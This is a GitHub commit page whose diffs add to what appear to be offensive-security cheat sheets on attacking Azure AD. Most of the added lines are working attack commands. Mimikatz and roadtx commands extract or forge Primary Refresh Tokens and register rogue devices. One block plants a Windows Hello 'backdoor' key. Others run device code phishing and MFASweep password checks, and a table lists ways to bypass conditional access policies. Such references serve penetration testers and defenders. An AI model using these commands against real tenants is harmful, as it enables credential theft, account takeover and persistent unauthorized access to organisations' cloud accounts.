-
-
Notifications
You must be signed in to change notification settings - Fork 240
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
24fe926
commit 23b16ca
Showing
5 changed files
with
58 additions
and
7 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -95,6 +95,16 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 | |
| ``` | ||
| ### Extract PRT v1 | ||
| ```ps1 | ||
| mimikatz # sekurlsa::cloudap | ||
| mimikatz # sekurlsa::dpapi | ||
| mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect | ||
| roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url https://portal.azure.com | ||
| ``` | ||
|
|
||
|
|
||
| ### Extract PRT on Device with TPM | ||
|
|
||
| * No method known to date. | ||
|
|
@@ -103,11 +113,17 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 | |
| ### Generate a PRT by registering a device | ||
|
|
||
| ```ps1 | ||
| roadtx interactiveauth -u [email protected] -p password123 -r devicereg | ||
| roadtx device -n devicename | ||
| roadtx prt -u [email protected] -p password123 –-key-pem devicename.key –-cert-pem devicename.pem | ||
| roadtx prtenrich –prt roadtx.prt | ||
| roadtx prt -u [email protected] -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -r 0.AVAApQL<snip> | ||
| # Get correct token audience | ||
| roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file | ||
| # Registering device | ||
| roadtx device -a register -n <device-name> | ||
| # Request PRT | ||
| roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key | ||
| # Use a PRT | ||
| roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com | ||
| ``` | ||
|
|
||
|
|
||
|
|
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -25,7 +25,24 @@ | |
| ### Join Devices | ||
| * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) | ||
| ### Register Devices | ||
| ```ps1 | ||
| roadtx device -a register -n swkdeviceup | ||
| ``` | ||
|
|
||
|
|
||
| ### Windows Hello for Business | ||
|
|
||
| ```ps1 | ||
| roadtx.exe prtenrich --ngcmfa-drs-auth | ||
| roadtx.exe winhello -k swkdevicebackdoor.key | ||
| roadtx.exe prt -hk swkdevicebackdoor.key -u <[email protected]> -c swkdeviceup.pem -k swkdeviceup.key | ||
| roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com | ||
| ``` | ||
|
|
||
|
|
||
| # Service Principals | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "[email protected]" | Format-Table | |
| ``` | ||
| ## Azure AD - Conditionnal Access Policy | ||
| ## Azure AD - Conditional Access Policy | ||
| Enumerate Conditionnal Access Policies: `roadrecon plugin policies` | ||
| Conditional Access is used to restrict access to resources to compliant devices only. | ||
| * Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) | ||
| | CAP | Bypass | | ||
| |---------------------------|---------| | ||
| | Location / IP ranges | Corporate VPN, Guest Wifi | | ||
| | Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | | ||
| | Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | | ||
| | Azure AD Joined Device | Try to join a VM (Work Access)| | ||
| | Device requirement | / | | ||
| | MFA | / | | ||
| | Legacy Protocols | / | | ||
| | Compliant Device (Intune) | / | | ||
| | Domain Joined | / | | ||
| ## Azure AD - MFA | ||
| * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services | ||
| ```ps1 | ||
| Import-Module .\MFASweep.ps1 | ||
| Invoke-MFASweep -Username [email protected] -Password Winter2020 | ||
| Invoke-MFASweep -Username [email protected] -Password Winter2020 -Recon -IncludeADFS | ||
| ``` | ||
|
|
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -83,6 +83,11 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph | |
| ## Device Code Phishing | ||
|
|
||
| * Using roadtool: `roadtx gettokens -u [email protected] --device-code` | ||
| ```ps1 | ||
| roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e | ||
| Requesting token for resource https://graph.windows.net | ||
| To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate. | ||
| ``` | ||
| * Using TokenTactics to request a token for Azure Graph API using a device code | ||
| ```ps1 | ||
|
|
||